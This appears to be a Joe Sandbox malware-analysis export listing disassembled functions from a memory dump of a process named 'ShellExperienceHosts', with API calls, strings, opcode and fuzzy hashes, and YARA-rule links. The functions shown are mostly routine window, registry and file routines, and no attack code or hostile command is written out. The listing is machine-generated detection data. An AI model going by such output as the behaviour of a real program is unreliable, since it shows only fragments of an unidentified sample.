Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
String ID:
API String ID: 1924968399-0
Opcode ID: 40a44dce23cfdbc365b2a315871d7eb36ef1bcb9a3822ebb4ee63c608180655c
Instruction ID: 5e39c94db1141b5fbf64f21501395aea24fc2fe429ee7f9b2355f274b2791a8c
Opcode Fuzzy Hash: 40a44dce23cfdbc365b2a315871d7eb36ef1bcb9a3822ebb4ee63c608180655c
Instruction Fuzzy Hash: 56417F71B412199FDB218F69C88ABEA77B8BF15748F2005A9F51AD7640C770DE808B93

Function 6C9DA145 Relevance: 10.6, APIs: 7, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9DA14C
CreateCompatibleDC.GDI32(?), ref: 6C9DA17B
GetClientRect.USER32(?,?), ref: 6C9DA198
SelectObject.GDI32(?,?), ref: 6C9DA1D1
BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 6C9DA1F8
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C9DA27E
SelectObject.GDI32(?,00000000), ref: 6C9DA28C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ObjectSelect$ClientCompatibleCreateH_prolog3_Rect
String ID:
API String ID: 1651110115-0
Opcode ID: bc553ba615a5cc19d2600a9a8e6c2b4fa428828e6b784cdb54b5a4e4e745141c
Instruction ID: 5e1eecc6caf0751fe718c7cc1600d0fa3cd3d37b750def57abaa54de44d8ebf9
Opcode Fuzzy Hash: bc553ba615a5cc19d2600a9a8e6c2b4fa428828e6b784cdb54b5a4e4e745141c
Instruction Fuzzy Hash: 4C411371A10209AFDF14DBA4DD95EEEBBB9FF68704F118119B106B3690DB70AE04CB61

Function 6CAF80C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CAF80F7
___except_validate_context_record.LIBVCRUNTIME ref: 6CAF80FF
_ValidateLocalCookies.LIBCMT ref: 6CAF8188
__IsNonwritableInCurrentImage.LIBCMT ref: 6CAF81B3
_ValidateLocalCookies.LIBCMT ref: 6CAF8208

Strings

csm, xrefs: 6CAF819D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cf82cefc1a53a5fc4cbba6b2b8f4a8f222ed90e5fea68d06a5ff927cfaae93ba
Instruction ID: 8eea137cf01dd5be4ae30fd1d84357be8641b479459615daa2ff24fd024bd45b
Opcode Fuzzy Hash: cf82cefc1a53a5fc4cbba6b2b8f4a8f222ed90e5fea68d06a5ff927cfaae93ba
Instruction Fuzzy Hash: 05418A34A011099BCF00CF59C890ADEBBB5AF46328F148156F9345B751D731E99ACB94

Function 6C9CEE18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9CEE22
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 6C9CEF27
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C9CEF44
RegCloseKey.ADVAPI32(?), ref: 6C9CEF65
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C9CEF80

Strings

Software\, xrefs: 6C9CEE8F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 76da72ed494bbc8a09df6563f83c217d2886dee9d4d82d7ee9820c9340662cb5
Instruction ID: fdb7afca9658e62db2e1208efe768451bdec7272e5468390f3c08b8a85428a14
Opcode Fuzzy Hash: 76da72ed494bbc8a09df6563f83c217d2886dee9d4d82d7ee9820c9340662cb5
Instruction Fuzzy Hash: 1C419871A01169BBDB209BA0DC99AEE777CEF19314F0005E9E516A3680DB34DF44CF92

Function 6C9E3E96 Relevance: 10.6, APIs: 7, Instructions: 113fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C9E3EB6
GetLastError.KERNEL32 ref: 6C9E3ED2
SetFilePointer.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000), ref: 6C9E3EFF
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C9E3F0D
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C9E3F2C
SetEndOfFile.KERNEL32(?,?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9E3F89
GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9E3FA3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: d04a2ffbae7c0f33f4d440e45cdf77f7a579ca4c0ac4234403b79abfa3e45942
Instruction ID: b449518925af1d69220be0a59dd7568b7d5f9c473e93dddbb5da2af62380f83f
Opcode Fuzzy Hash: d04a2ffbae7c0f33f4d440e45cdf77f7a579ca4c0ac4234403b79abfa3e45942
Instruction Fuzzy Hash: 5A318C31600218BFCF119BA5EC48EDF7BBDEF19264F108529F91997A50DB31EA14DBA0

Function 6C9CEB7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C9CEB86
RegOpenKeyExW.ADVAPI32(?,00000010,00000000,0002001F,?,00000228), ref: 6C9CEC2C

Part of subcall function 6C9CEB19: __EH_prolog3.LIBCMT ref: 6C9CEB20

RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C9CEC50
RegCloseKey.ADVAPI32(?), ref: 6C9CED05

Strings

Software\Classes\, xrefs: 6C9CEBD2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseEnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 854624316-1121929649
Opcode ID: 6d65ff9cbda115b7714b1fa9e896ba819bd9793244d6b917b26169bfba9ab764
Instruction ID: a26bd39de6acb65cd128d2e3ebc67842085ce8b24dbc6e0545c58ae3e24a418e
Opcode Fuzzy Hash: 6d65ff9cbda115b7714b1fa9e896ba819bd9793244d6b917b26169bfba9ab764
Instruction Fuzzy Hash: 2541A376A40258EBDB21DBA4DD89BDD77B8AF28314F1001D9D80A63780DB34DF88CE52

Function 6C9BACF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9BAD1B
GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 6C9BAD50
GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 6C9BAD78

Strings

user32.dll, xrefs: 6C9BAD11
GetTouchInputInfo, xrefs: 6C9BAD42
CloseTouchInputHandle, xrefs: 6C9BAD6A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
API String ID: 667068680-1853737257
Opcode ID: c93c45803c8a14175ed574f964826fab2f17d3dabd50c3d0b6e16be8ad0a8307
Instruction ID: a5dd134582207d2f7aad97455f8a5e2508505e64b959434f403797d256d7a3aa
Opcode Fuzzy Hash: c93c45803c8a14175ed574f964826fab2f17d3dabd50c3d0b6e16be8ad0a8307
Instruction Fuzzy Hash: 72314D74B06219ABDF149F39E848D5A3BBDEB97765B10052BE809E7784EF30D800CB90

Function 6C9C0C1A Relevance: 10.6, APIs: 7, Instructions: 85windowthreadCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 6C9C0C39
GetParent.USER32(?), ref: 6C9C0C47
GetWindowThreadProcessId.USER32(?,00000000), ref: 6C9C0C62
GetCurrentProcessId.KERNEL32 ref: 6C9C0C68
GetActiveWindow.USER32 ref: 6C9C0CC7
SendMessageW.USER32(?,00000006,00000001,00000000), ref: 6C9C0CD8
SendMessageW.USER32(?,00000086,00000001,00000000), ref: 6C9C0CF2

Part of subcall function 6C9BE3BF: EnableWindow.USER32(?,00000064), ref: 6C9BE3D0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
String ID:
API String ID: 2169720751-0
Opcode ID: f35ca8e404b9ffac7127bba7a03fe7510c55c78641f6fc84e7fdef277577817b
Instruction ID: 7d679e669bb24584bb038c40000743adc4561079ca28cdc233edb51d9060198f
Opcode Fuzzy Hash: f35ca8e404b9ffac7127bba7a03fe7510c55c78641f6fc84e7fdef277577817b
Instruction Fuzzy Hash: F431D271380298EBEB258F20CC88B9D7BB9FF51755F200150F949AB9D0CBB4E954CB92

Function 6CA246F9 Relevance: 10.6, APIs: 7, Instructions: 85COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(00000000,00000004,00000004), ref: 6CA2473A
ValidateRect.USER32(?,00000000,0000E800), ref: 6CA24776
UpdateWindow.USER32(?), ref: 6CA2477F
LockWindowUpdate.USER32(00000000), ref: 6CA24790
ValidateRect.USER32(?,00000000,0000E800), ref: 6CA247BE
UpdateWindow.USER32(?), ref: 6CA247C7
LockWindowUpdate.USER32(00000000), ref: 6CA247D8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: d8f113c0bf891fad88e84a12ad39d3ab3139da846773a5833a2d1bf8b7779b34
Instruction ID: 851965af8ad099d756eb7b47f7057f89b1761a79bcf8bbfd2a9bfda487ddc4ab
Opcode Fuzzy Hash: d8f113c0bf891fad88e84a12ad39d3ab3139da846773a5833a2d1bf8b7779b34
Instruction Fuzzy Hash: B731DF35A01715EFDB10CF64C988B8A7BF5FF56705F184169E8AAA7A50EB34E980CF00

Function 6C9CBECF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9CBED9
GetClassNameW.USER32(?,?,000000FF), ref: 6C9CBF33
IsAppThemed.UXTHEME(?,?,?,?), ref: 6C9CBFC4
GetStockObject.GDI32(00000005), ref: 6C9CBFD5

Strings

Static, xrefs: 6C9CBF6C
Button, xrefs: 6C9CBF55

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClassH_prolog3_NameObjectStockThemed
String ID: Button$Static
API String ID: 2434646892-2498952662
Opcode ID: 7af0a7a1ae4b9cb55dc94e9006cbe005d73104e037b7c2ef48690d7697b7d02f
Instruction ID: 0ae332bd1e9973f1d14820f5bfafcbe1605a98563b085b7d76c8861a0ad9b21b
Opcode Fuzzy Hash: 7af0a7a1ae4b9cb55dc94e9006cbe005d73104e037b7c2ef48690d7697b7d02f
Instruction Fuzzy Hash: 2131B435B402199BDB14DF54CC88BEE7378AF64314F104599E51967B80DB70EA85CF63

Function 6CA361E4 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA361EB

Part of subcall function 6CA36109: __EH_prolog3.LIBCMT ref: 6CA36110
Part of subcall function 6CA36109: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6CA36163
Part of subcall function 6CA36109: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6CA36179

CopyRect.USER32(?,?), ref: 6CA36220
GetCursorPos.USER32(?), ref: 6CA36232
SetRect.USER32(?,?,?,?,?), ref: 6CA36245
IsRectEmpty.USER32(?), ref: 6CA36260
InflateRect.USER32(?,00000002,00000002), ref: 6CA36272
DoDragDrop.OLE32(00000000,00000000,?,?), ref: 6CA362BA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
String ID:
API String ID: 1837043813-0
Opcode ID: 911107ea20e03c7d8cb53c858249bd36201a90dbf303d761c887cb470f67d79d
Instruction ID: a334a1aa12ddfe80c4e455f1beef57a3e8bb6367b13c277248000cb397a0e4bc
Opcode Fuzzy Hash: 911107ea20e03c7d8cb53c858249bd36201a90dbf303d761c887cb470f67d79d
Instruction Fuzzy Hash: 6D314875E016A89FDF018FE4C994DEEBBB9BF59304B414019E819EB744CB349A4ACB60

Function 6C9CDCB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C9CDCEF
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C9CDD1B
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C9CDD47
RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD59
RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD68

Part of subcall function 6C9CE1CB: GetModuleHandleW.KERNEL32(Advapi32.dll,0002001F,?,?,6C9CDCED,80000001,software,00000000,0002001F,?), ref: 6C9CE1DC
Part of subcall function 6C9CE1CB: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C9CE1EC

Strings

software, xrefs: 6C9CDCD8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseCreate$AddressHandleModuleOpenProc
String ID: software
API String ID: 550756860-2010147023
Opcode ID: 9b22dd98a6f0009048fcc6d851ac2f388ebb9886706422b5366b29825b7a7b6d
Instruction ID: 2c5c1b7f4e8c4b0864c280882ca79494714423b017c153e31c57654419a02f5e
Opcode Fuzzy Hash: 9b22dd98a6f0009048fcc6d851ac2f388ebb9886706422b5366b29825b7a7b6d
Instruction Fuzzy Hash: B32135B2F41158FBEB119E94C844EAF7BBDEB45708F10406AF905E6A00D7308A04CBA2

Function 6CB11AB2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6CB11BC1,?,6CB0CF76,00000000,00000000,00000008,?,6CB11E2B,00000022,FlsSetValue,6CB62C68,6CB62C70,00000000), ref: 6CB11B73

Strings

ext-ms-, xrefs: 6CB11B1D
api-ms-, xrefs: 6CB11B09

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: fef4fe035b2254e27f1da4bd1f82281cf9544c8a5723a7adebb7f43f7e2dae8c
Instruction ID: d86321da165308a7a64af38ecff8f5e980ea86a919fec424818e463bb45b04a9
Opcode Fuzzy Hash: fef4fe035b2254e27f1da4bd1f82281cf9544c8a5723a7adebb7f43f7e2dae8c
Instruction Fuzzy Hash: 0321C931B4A2A4A7DB118BA6DD44A5F7778DF53374F280221E915A7E90E730EB00C5D1

Function 6C9BBB52 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,user32.dll,?,?,00000000,?,6C9BA259,00000000,00000000), ref: 6C9BBB63
GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 6C9BBB75
GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 6C9BBB83

Strings

UnregisterTouchWindow, xrefs: 6C9BBB7B
user32.dll, xrefs: 6C9BBB5A
RegisterTouchWindow, xrefs: 6C9BBB6F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
API String ID: 667068680-2470269259
Opcode ID: efc1941fdb85c6603c44d0604bf87744ab91b94fa1a5d153db5adf0e132c5b9d
Instruction ID: 83c7e83264024978836259a7df747f6d42c047f015cf930c34e3b1aa2bc4e6b9
Opcode Fuzzy Hash: efc1941fdb85c6603c44d0604bf87744ab91b94fa1a5d153db5adf0e132c5b9d
Instruction Fuzzy Hash: 5C11D3327015697BCB111A65E888D5EBBBCFF85369F100126ED09A3E44DB70EC108BD0

Function 6C9F8F8C Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000407,00000000,?), ref: 6C9F8FB7
IsRectEmpty.USER32(?), ref: 6C9F8FD3
IsRectEmpty.USER32(?), ref: 6C9F8FDE
GetCursorPos.USER32(00000000), ref: 6C9F8FF4
ScreenToClient.USER32(?,00000000), ref: 6C9F9001
PtInRect.USER32(?,00000000,00000000), ref: 6C9F9014
PtInRect.USER32(?,00000000,00000000), ref: 6C9F9025

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Empty$ClientCursorMessageScreenSend
String ID:
API String ID: 703117857-0
Opcode ID: cdc413065616a4718d3cddecc0faf4a79fb09b27e7556342a4d7ba5ebcba68bd
Instruction ID: 6f73303745fa43e007ab260e189d4d2e0be692a3ca1258d6e2c05b0b44446217
Opcode Fuzzy Hash: cdc413065616a4718d3cddecc0faf4a79fb09b27e7556342a4d7ba5ebcba68bd
Instruction Fuzzy Hash: 42216A71600249FFEF209FA1C848FEEBBBDEF05349F100029B129A2450DB71E955DB60

Function 6C9DDFF6 Relevance: 10.6, APIs: 7, Instructions: 68windowCOMMON

Download Yara Rule

APIs

GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C9DE010
DispatchMessageW.USER32(?), ref: 6C9DE022
PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C9DE030
SetRectEmpty.USER32(?), ref: 6C9DE058
GetDesktopWindow.USER32 ref: 6C9DE070
LockWindowUpdate.USER32(?,00000000), ref: 6C9DE081
GetDCEx.USER32(?,00000000,00000003), ref: 6C9DE098

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

